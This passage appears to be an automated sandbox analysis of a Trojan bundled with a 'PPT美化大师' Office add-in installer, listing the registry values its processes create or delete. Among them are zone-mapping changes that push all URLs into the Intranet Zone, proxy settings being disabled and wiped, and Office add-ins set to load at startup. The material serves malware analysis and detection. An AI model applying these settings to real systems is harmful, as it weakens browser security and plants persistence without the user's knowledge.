"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 84 70 76 50 17 53 A0 4E 4A 95 5F FB 3C 7D 36"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process 1419052427l238l63518.exe&_upt=6ec6a9a21419053027:1812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E A5 5E 95 45 54 1E 37 10 8B 3A 1F 7F B5 05 A7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\Internet Explorer]
"iexplore.exe" = "Internet Explorer"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots that do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process OfficeAssist.0419.80.1123.exe:744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayName" = "PPT美化大师"

[HKCU\Software\PPTAssist\Common]
"infoGUID" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKCU\Software\PPTAssist\Common\Setting]
"HideExcelPane" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayIcon" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist]
"assistupdate.exe" = "PPT美化大师"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"Publisher" = "珠海金山办公软件有限公司"

[HKCU\Software\PPTAssist\Common]
"DistSrc" = "80.1123"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"LocationRoot" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"DisplayVersion" = "1.0.0.0419"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\pptassist\~21d1e5\install_res\1.png,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\PPTAssist\Common\Setting]
"HidePowerPntPane" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Persisted\%Documents and Settings%\All Users\Application Data\kingsoft\20141220_20542]
"OfficeAssist.0419.80.1123.exe" = "1"

[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"Version" = "2.5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\PPTAssist]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\utility\uninst.exe"

[HKCU\Software\PPTAssist\Common\Setting]
"HideWordPane" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 01 11 EA 39 04 7C C5 5F 78 10 78 B4 DA 80 18"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"regsvr32.exe" = "Microsoft(C) Register Server"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCR\TypeLib\{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}\2.5\HELPDIR]
"(Default)" = "%Program Files%\Common Files\Microsoft Shared\OFFICE14"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist]
"notify.exe" = "PPT Assist Expansion tool"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\PPTAssist\Common]
"Version" = "1.0.0.0419"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCR\Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\TypeLib]
"(Default)" = "{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}"

The Trojan modifies the IE security-zone settings so that all local web nodes (names without dots) that are not assigned to any other zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process OfficeAssist.0419.80.1123.exe:1752 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C AC 34 08 E8 A4 9C 69 66 D5 4C 77 7C D3 8D D2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process regsvr32.exe:2136 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"

[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"

[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"

[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 98 28 95 58 44 3E 4B C5 13 C2 2B D5 E1 01 09"

[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"

[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"

[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"

The process regsvr32.exe:2716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F AA 29 AE 0B B0 15 0B DB 79 47 BC 79 F8 93 9F"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"

[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"

[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"

[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"

[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"

[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"

The process regsvr32.exe:1280 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Classes\PPTAssist.Addins]
"(Default)" = "PPTAssist Class"

[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Classes\PPTAssist.Addins\CLSID]
"(Default)" = "{034DF736-A378-4292-ACAE-A561088999F5}"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\Version]
"(Default)" = "1.0"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"

[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\ProgID]
"(Default)" = "PPTAssist.Control.1"

[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist"

[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0\FLAGS]
"(Default)" = "0"

[HKCU\Software\Classes\PPTAssist.Control.1\CLSID]
"(Default)" = "{1077138E-896C-445E-BD31-CFCFFA4636C4}"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Classes\PPTAssist.Addins.1\CLSID]
"(Default)" = "{034DF736-A378-4292-ACAE-A561088999F5}"

[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"CommandLineSafe" = "1"

[HKCU\Software\Classes\PPTAssist.Control]
"(Default)" = "PPTAssistControl Class"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}\TypeLib]
"(Default)" = "{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}"

[HKCU\Software\Classes\TypeLib\{D68E2E9E-75B9-4D1A-99DB-5C83A17D5518}\1.0]
"(Default)" = "PPTAssist 1.0 类型库"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\VersionIndependentProgID]
"(Default)" = "PPTAssist.Addins"

[HKCU\Software\Microsoft\Office\Powerpoint\Addins\PPTAssist.Addins]
"Description" = "PPT美化大师"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}\ProgID]
"(Default)" = "PPTAssist.Addins.1"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}]
"(Default)" = "IRibbonCallback"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\TypeLib]
"Version" = "1.0"

[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"FriendlyName" = "PPT美化大师"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\PPTAssist\pptassist.dll"

[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"LoadBehavior" = "3"

[HKCU\Software\Microsoft\Office\Word\Addins\PPTAssist.Addins]
"Description" = "PPT美化大师"

[HKCU\Software\Classes\PPTAssist.Addins.1]
"(Default)" = "PPTAssist Class"

[HKCU\Software\Microsoft\Office\Excel\Addins\PPTAssist.Addins]
"Description" = "PPT美化大师"

[HKCU\Software\Classes\CLSID\{034DF736-A378-4292-ACAE-A561088999F5}]
"(Default)" = "PPTAssist Class"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 B1 53 ED 4F BB 45 4B EF 51 8F C1 FF E7 FE 4A"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCU\Software\Classes\PPTAssist.Addins\CurVer]
"(Default)" = "PPTAssist.Addins.1"

[HKCU\Software\Classes\Interface\{D5D8E0B6-F42F-43B2-BE45-7A065242F6EE}]
"(Default)" = "IWpsAssistControl"

[HKCU\Software\Classes\Interface\{CE895442-9981-4315-AA85-4B9A5C7739D8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}]
"(Default)" = "PPTAssistControl Class"

[HKCU\Software\Classes\CLSID\{1077138E-896C-445E-BD31-CFCFFA4636C4}\VersionIndependentProgID]
"(Default)" = "PPTAssist.Control"

